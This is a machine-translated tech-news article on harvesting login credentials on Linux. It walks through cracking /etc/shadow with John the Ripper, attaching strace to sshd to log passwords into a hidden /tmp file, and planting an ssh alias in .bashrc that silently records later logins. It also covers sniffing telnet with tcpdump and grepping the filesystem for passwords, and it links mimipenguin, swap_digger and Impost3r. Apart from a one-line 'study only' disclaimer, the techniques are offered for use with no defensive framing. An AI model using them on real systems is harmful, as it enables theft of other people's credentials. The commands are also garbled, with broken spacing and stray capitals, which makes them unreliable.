Shulou(Shulou.com)06/01 Report--

This article mainly introduces the skills of crawling login credentials under Linux, which has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.

For reference and study only

01. History records sensitive operations

The Linux system will automatically record the user's operation commands in the history list. When the user enters the account number and password on the command line to log in, it will lead to the disclosure of sensitive information.

02. Shadow file cracking

Shadow is used to store password information for users in the Linux system, using a use case to illustrate:

Root:$1$ aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::

The password field ciphertext consists of three parts, namely: $idsalt$encrypted. When id=1 is encrypted with md5, the weak password is easy to be cracked.

When id is 5, SHA256 is used for encryption, and when id is 6, SHA512 is used for encryption, which can be violently cracked through john.

Wget https://www.openwall.com/john/k/john-1.9.0.tar.gz tar-zxvf john-1.9.0.tar.gz make clean linux-x86-64. / john / etc/shadow

03. Mimipenguin crawl password

A password crawling artifact under Linux requires root permission to run. It makes use of plaintext credentials in memory by dumping the process and extracting lines that are likely to contain plaintext passwords. It currently supports operating systems such as Kali and Ubnutu.

Github address:

Https://github.com/huntergregal/mimipenguin

04. Use Strace to collect login credentials

Strace is a dynamic tracking tool comparable to the existence of a keylogger that can be used to collect login credentials.

(1) obtain the plaintext password of the sshd process

(strace-f-F-p `ps aux | grep "sshd-D" | grep-v grep | awk {'print $2'} `- t-e trace=read,write-s 322 > / tmp/.sshd.log &)

Use the in process to match the user and password

# find the user name and password grep-E'read\ (6, ". +\ 0\ 0\ 0\ 0\ 0\. +"'/ tmp/.sshd.log # result is in the form [pid 2401] 22:34:34 read (6, "\ 10\ 0\ 0\ 0\ 0 4root", 9) = 9 [pid 2401] 22:34:34 read (6, "\ 4\ 0\ 0\ 0\ 16ssh-connection\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 27) = 27 [pid 2401] 22:34:34 read (6, "\ f\ 0\ 0\ 0\ 4toor", 9) = 9

(2) collect ssh login credentials

# add the command alias vi ~ / .bashrc or / etc/bashrc alias ssh='strace-f-e trace=read,write-o / tmp/.ssh- `date'+% d% m% s`. Log-s 32 ssh' # to make the command alias take effect immediately source ~ /. Bashrc

The last 8 matching lines are found through grep, and the number of lines can be adjusted according to the length of the password.

Grep-A 9 'password'. Ssh-25Sep091601017212.log

05. Tcpdump packet capture analysis

Grab the data packet for analysis, and obtain the plaintext account password, such as ftp, telnet, http.

Tcpdump-I ens33 port 23-w test.cap

06. Search for sensitive information comprehensively

Global search for configuration files, scripts, databases, and log files for passwords.

Grep-rn "password=" /

07 、 swap_digger

A bash script for automatic Linux exchange analysis, automatic exchange extraction, and search for Linux user credentials, Web form credentials, Web form email, HTTP basic authentication, WiFi SSID and keys, etc.

Github project address:

Https://github.com/sevagas/swap_digger

08 、 Impost3r

A tool written in C language to steal all kinds of passwords (ssh,su,sudo) under linux.

Github project address:

Https://github.com/ph5ntonn/Impost3r thank you for reading this article carefully. I hope the article "what are the skills of crawling login credentials under Linux" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.